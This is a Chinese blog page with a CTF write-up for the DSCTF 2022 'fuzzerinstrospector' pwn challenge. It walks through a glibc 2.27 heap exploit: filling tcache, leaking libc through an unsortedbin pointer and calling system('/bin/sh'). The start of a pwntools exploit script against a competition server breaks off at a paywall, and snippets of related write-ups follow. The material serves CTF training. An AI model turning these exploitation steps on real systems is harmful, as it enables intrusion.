DSCTF pwn 部分wp

原创 已于 2022-07-18 14:19:57 修改 · 859 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ubuntu #pwn

于 2022-07-15 21:05:06 首次发布
这篇博客详细介绍了如何利用fuzzerinstrospector和rusty两个pwn题目中的堆溢出漏洞,通过泄露libc基址并调用system函数执行/bin/sh来获取shell。作者首先分析了程序的内存分配和释放行为,然后通过精心构造的堆块合并和off-by-one错误,成功泄露了libc基址。最后,通过fastbin attack实现了getshell。博客中还提到了一些在不同glibc版本下的技巧和挑战,以及解决方案。

DSCTF pwn 部分wp

原谅我懒,不想附图了,客官老爷们多包涵。

拿了第七:

32RK7_6C5A[)O6($F8NH1$C

出了两道pwn:

66J0WNBXM}1U_C7~XZV(MBR

fuzzerinstrospector

Case 6 有带rdi的任意指针调用,只要泄露libc即可。

rdi指向的内容可控。

add函数和edit函数功能相似。add函数malloc指定大小0x108。

前八个字节是自己写进的东西,后面字节是类似于一个字典的东西。通过字典才能打印。

可以先free掉七个堆块进入tcache填满,然后delete堆块进入unsortedbin。

不过申请unsortedbin的时候,他似乎会先检查符合tcache大小,然后放进tcache再分配,这时候会清空fd,就不能达到泄露的目的。

所以我通过合并操作先让他与旁边堆块合并再与top chunk合并,保留下来了fd指针。

然后利用scanf读入失败,就不会给前八字节赋值,把fd保留下来了,然后泄露libc基址。

最后调用system(‘/bin/sh’)即可。

exp:

from secrets import choice
from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/DSCTF/fuzzerinstrospector')
r  =remote('39.105.185.193',30007)
libc = ELF('/mnt/hgfs/ubuntu/DSCTF/libc-2.27.so')

def menu(choice):
    r.recvuntil(b"Your choice: ")
    r.sendline(str(choice))

def add(index,content):
    menu(1)
    r.recvuntil(b"Index: ")
    r.sendline(str(index))
    for i in range(8):
最低0.47元/天 解锁文章
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 802
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
菜狗的pwn学习笔记(二)
weixin_43225801的博客
03-08 1030
pwn的堆学习笔记(二)–cgctf note 今天来做下学校平台的pwn的note。 0x0 攻击思路 首先拖进ida,看到有 puts("1.add"); puts("2.show"); puts("3.edit"); puts("4.delete"); puts("5.exit"); printf("choice>>"); 很标
CISCN PWN签到题 task_note_service
Bill
05-02 1800
序言 比赛中这道差那么一点点就做出来了 程序运行 1.menu ---------menu--------- 1. add note 2. show note 3. edit note 4. del note 5. exit your choice>> 2. add 1. add note 2. show note 3. edit note 4. del...
DSCTF2022 fuzzerinstrospector-Wp
m0_46329041的博客
07-17 362
由于这题的libc版本是2.27的,存在tcache,题目限制了最多申请9个chunk,所以,申请9个并释放,填满tcache后,剩下的chunk由于大于fastbin的size,会进入unsortedbin,这样就可以通过该chunk的fd指针泄露出main_arena,从而计算得到libc,然后再计算出system的地址,并向chunk写入。BitMap是一种算法,在数据量特别大时,可以很好的缩减时间复杂度,通过在对应位置填上对应的值,来表明该位置代表的数字,是否存在。,并调用6号选项即可。......
CG-CTF pwn部分wp
awxnutpgs545144602的博客
08-16 468
面向pwn刷cgctfPWN1,When did you born题目给了一个ELF文件,和一个.C文件先运行ELF,大概如下What’s Your Birth?0What’s Your Name?0You Are Born In 0You Are Naive.You Speed One Second Here.打开.C文件,发现是ELF的源码 #include ...
buuctf get_started_3dsctf_2016 wp(python3
Kata_Jhin的博客
03-14 269
buuctf get_started_3dsctf_2016 wp(python3
几道buuctf pwn wp
weixin_44113469的博客
02-07 456
buuctf wp try_your_nc from pwn import * from sys import * debug=1 if debug: p=remote("node3.buuoj.cn",26062) else: p=process("xxx") p.interactive() pwn1_sctf_2016 C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数 from pwn import * from sys import * debug=1 c
[BUUCTF]PWN11——get_started_3dsctf_2016
mcmuyanga的博客
08-28 4847
[BUUCTF]PWN11——get_started_3dsctf_2016 题目网址:https://buuoj.cn/challenges#get_started_3dsctf_2016 步骤: 第一个方法,本地打通,要自己创建一个flag.txt 例行检查,32位,开启了nx保护 nc一下,看看程序大概的执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了flag.txt 双击跟进,ctrl+x查看哪个函数调用了它,发现了一个函数,当a1=0x308cd64f,a2=0x19
BUUCTF pwn wp 11 - 15
fa1c4的blog
08-17 545
ciscn_2019_n_8 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] var[13] = 0; var[14] = 0; init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5);
2022 DSCTF决赛wp
qq_45603443的博客
08-04 1114
2022 DSCTF决赛wp
d^3CTF web部分wp
fmyyy1的博客
03-07 1268
d3oj 提示是尝试用oct用户登陆,翻组件版本看到个合适的 https://hackerone.com/reports/869574 编辑文章哪里很明显 POST /article/0/edit HTTP/1.1 Host: xxx User-Agent: xx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0
BUUCTF pwn wp 16 - 20
fa1c4的blog
08-24 608
[HarekazeCTF2019]baby_rop int __cdecl main(int argc, const char **argv, const char **envp) { char v4[16]; // [rsp+0h] [rbp-10h] BYREF system("echo -n \"What's your name? \""); __isoc99_scanf("%s", v4); printf("Welcome to the Pwn World, %s!\n", v4
NKCTF pwn方向wp
maple105890的博客
03-27 617
然后放堆快指针的附近有malloc_context+0x18的地址,里面有很多dirty_data,而且got表可写,泄露出来打free函数。然后发现二次输入能直接把rbp末尾覆盖成\x00,那就在栈中构造rop链就好了。所以考虑和ez_stack一样的做法,比爆破ogg快多了。虽然给了libc,但构造了⼀下shellcode也能出。存在格式化字符串漏洞,先把cananry泄露出来。给了libc,可以光明正大偷鸡了bushi。直接rand搞一下就出了,连爆破都不用。和西湖那题有一点像,但那题还要抬栈。
TAMU ctf pwn部分wp+赛后
z1r0的博客
04-19 2535
TAMU ctf pwn部分wp 国外的题目,终端连不上就很gan ga。。。。。。 Tr*vial 大水题,栈溢出,ret2text exp from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1b[01
2021祥云杯 CTF pwnwp
qq_39948058的博客
08-26 1357
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
(XGCTF)西瓜杯pwn部分wp
susu_xiaosu的博客
07-23 881
【代码】(XGCTF)西瓜杯pwn部分wp
CTF(PWN基础笔记)
WuXianYo_的博客
03-17 359
8)完成计算后,执行pop ebp,因被调函数(子函数)不存在局部变量,所以在最后esp与ebp在同一个指向上,不需要leave指令移动esp到ebp(若存在局部变量,则esp与ebp不在同一点,因为需要留出栈空间存放变量),pop ebp将esp指向的父函数的原先的ebp值存入ebp中,所以ebp会回到原先指向的位置,esp再自动抬高一个字长,最后执行return指令,将下方的esp再抬高一个字长,并将esp原来指向的值存入esp中。6)执行mov,将esp的值赋给sbp,把ebp抬到新的栈底.
2021 Picoctf pwn部分wp
weixin_46521144的博客
07-18 703
首先说一下,是参考了校内学长的复盘讲解hhh,这也是第一次直接接触在线的ctf而不是靶场。 Gauntlet1 在ida里面看一下。这三道Gauntlet都是一个类型的,漏洞都是一个格式化字符串+栈溢出。 那就很容易直接把shellcraft.sh()写道栈上,因为一开始给打印了背写区域的起始位置并且使可执行的栈,一溢出就会跳转到我们写的shellcraft上面执行。注意中间还要有个格式化字符串的额send,不要忘了,之前卡在这里好久啊。。。 exp from pwn import * context.
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 812
buuctf pwn
ctfshow-pwnwp
最新发布
09-17
CTFShow平台PWN题的解题思路和过程在不同题目中有所不同。以CTFSHOW PWN02为例,解题脚本通过`pwn`库进行操作。脚本根据`contect`变量的值来选择是本地运行程序还是远程连接目标服务器。构造了长度为13个字节的`a`...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值